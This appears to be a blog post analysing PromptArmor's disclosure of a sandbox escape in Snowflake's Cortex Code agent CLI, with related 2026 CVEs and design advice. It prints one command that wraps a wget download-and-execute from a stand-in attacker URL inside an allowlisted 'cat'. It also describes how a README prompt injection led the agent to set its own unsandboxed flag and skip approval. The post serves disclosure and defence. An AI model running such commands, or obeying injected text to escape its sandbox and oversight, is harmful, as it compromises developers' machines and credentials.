Snowflake released Cortex Code, their AI coding agent CLI, on February 2, 2026. Three days later, PromptArmor had a working exploit that chained two separate vulnerabilities into a full sandbox escape with arbitrary code execution.
A prompt injection hidden in a GitHub README. A "safe" command that wasn't safe. A sandbox flag the AI could flip without asking. The result: malware downloaded and executed on the developer's machine, with their active Snowflake credentials, and zero human approval.
PromptArmor's disclosure is technically detailed and worth reading in full. But the real story isn't about Snowflake. It's about a design pattern that nearly every AI coding agent shares, and why it's fundamentally broken.
Two Bugs, One Kill Chain
The exploit required chaining two separate flaws, and the combination is what made it lethal.
Flaw 1: The Command Validation Bypass
Cortex Code maintained an allowlist of "safe" commands that could execute without human approval. cat was on that list. Reasonable enough: reading a file shouldn't require a confirmation dialog.
But Cortex validated the command name without parsing the full command structure. Bash process substitution let attackers embed arbitrary execution inside what looked like a harmless cat:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
To the validator, this was cat. To the shell, it was "download a script from an attacker's server and execute it." The validation checked the label, not the behavior.
Flaw 2: The Unsandboxed Execution Flag
Cortex Code had a flag that allowed commands to execute outside the sandbox, intended for legitimate cases where a command needed network access or broader file system permissions. The AI model itself could set this flag. Combined with the validation bypass, this meant the malicious command ran outside the sandbox, and the user was never prompted for consent.
The Chain
A developer asks Cortex to review a GitHub repository. The README contains a prompt injection at the bottom. Cortex reads it, gets manipulated into constructing the process substitution command, sets the unsandboxed execution flag, and runs the payload. The developer sees nothing. No approval dialog. No warning. Just a "safe" cat command in the logs.
Here's the detail that makes it worse: PromptArmor found that the primary Cortex agent actually warned the user that a malicious command had been detected and advised them not to run it. What it failed to mention was that a sub-agent had already executed the command. The system told you about the fire after your house had already burned down. Multi-agent architectures create information asymmetries where no single agent has full visibility into what the system has done, and the user is left trusting a summary from a model that doesn't know what its own sub-agents did.
The Confused Deputy at the Heart of Every AI Coding Agent
This is a confused deputy problem. The AI agent has legitimate authority (executing commands on behalf of the developer) but acts on instructions from an untrusted source (the contents of a repository it was asked to review). The agent can't distinguish between what the developer wants and what the attacker injected.
Every AI coding agent with a "human-in-the-loop" approval mechanism needs to answer a question that most haven't even asked: what happens when the model itself is the attack vector?
The approval flow in Cortex Code assumed the model was a trusted intermediary. It could recommend commands, set execution flags, and invoke the validation system. The human-in-the-loop check was designed to catch risky commands, but the model controlled which commands looked risky. When the attacker controls the model's reasoning through prompt injection, the approval mechanism isn't bypassed; it's weaponized by the agent itself.
This is the same architectural flaw I wrote about with the recursive trust problem in agentic security: if the system that identifies threats is also the system that can be compromised, your security model has a circular dependency.
Three Days Is Not a Timeline. It's a Verdict.
PromptArmor found this vulnerability three days after Cortex Code shipped. That's not because PromptArmor is unusually fast. It's because the attack surface was obvious to anyone who understands prompt injection.
The timeline tells the story:
- February 2: Cortex Code released
- February 5: PromptArmor submits responsible disclosure
- February 28: Snowflake deploys fix (v1.0.25)
- March 16: Coordinated public disclosure
Credit to both parties: PromptArmor disclosed responsibly, and Snowflake fixed it within a month. But 23 days of exposure for a tool that executes code on developer machines with active cloud credentials is significant. The malicious script could harvest cached Snowflake session tokens stored on the developer's machine, meaning a single compromised workstation could give an attacker read-write access to production data warehouses. This isn't a developer tool risk; it's a data platform risk.
And this was the vulnerability that got caught. As the growing catalog of AI coding agent incidents shows, most failures don't get postmortems. The question every enterprise should ask: what about the ones that didn't?
This Is a Pattern, Not an Incident
Snowflake isn't alone. 2026 has already produced a wave of AI sandbox escape vulnerabilities:
- N8n (CVE-2026-25049, CVSS 9.4): sandbox escape in the AI workflow automation platform allowing arbitrary server commands
- vm2 (CVE-2026-22709, CVSS 9.8): the Node.js sandbox used by countless AI tools, broken by an async proxy trap technique
- Agenta-API (CVE-2026-27952, CVSS 8.8): Python sandbox escape through an incorrectly allowlisted numpy import
- Enclave (CVE-2026-27597): critical RCE in a sandbox explicitly designed for "safe AI agent code execution"
The pattern is consistent: sandboxes designed for AI agent code execution are failing at rates that would be unacceptable for any other security control. Academic analysis has found that sandbox defenses against malicious AI skills have only a 17% average defense rate. That's not a defense. That's a suggestion.
The core issue is architectural. Traditional sandboxes assume the code being sandboxed is written by a developer who might make mistakes. AI agent sandboxes need to assume the code is written by an adversary who controls the model's reasoning. Those are fundamentally different threat models, and the YOLO problem in AI agent security keeps getting worse because developers are granting agents capabilities faster than the security model can evolve.
What the Fix Actually Requires
Snowflake's v1.0.25 patch addressed the specific vulnerabilities: better command parsing, restrictions on the unsandboxed execution flag. But patching individual flaws doesn't fix the architectural problem. The next bypass will use a different technique to achieve the same goal: making a dangerous command look safe to a validator that can't understand intent.
The industry needs to move beyond the allowlist-plus-approval model:
Treat the model as untrusted input, not a trusted intermediary. Every command the model generates should be validated with the same rigor as user input from the internet. The model's recommendation to set an execution flag should carry zero authority. As we saw with the McKinsey Lilli breach, when AI agents have writable access to their own execution context, the blast radius expands dramatically.
Sandbox at the infrastructure level, not the application level. Application-level sandboxes (allowlists, regex-based command parsers, flag systems) are consistently broken by semantic bypasses. MicroVM isolation, where each agent runs in a dedicated virtual machine with its own kernel, eliminates the shared-kernel attack surface that makes container escapes possible.
Separate the approval mechanism from the execution context. If the AI can set its own execution flags, the approval mechanism is performative. The system that decides whether a command is safe must be architecturally isolated from the system that executes it, with no shared state the model can manipulate.
Assume prompt injection will succeed. The question isn't whether an attacker can manipulate the model's reasoning; Google's own research proved that's essentially unsolvable at the model layer. The question is whether a compromised model can cause real damage. Design the permission model so the answer is no.
The Takeaway
The Snowflake Cortex Code vulnerability isn't a story about one company shipping a bug. It's a story about an entire product category shipping the same architectural assumption: that AI models can be trusted to police their own execution boundaries.
They can't. The model is the attack surface, not the security layer. Until AI coding agents are designed with that understanding, every "human-in-the-loop" approval dialog is just a checkbox that the AI can check for you.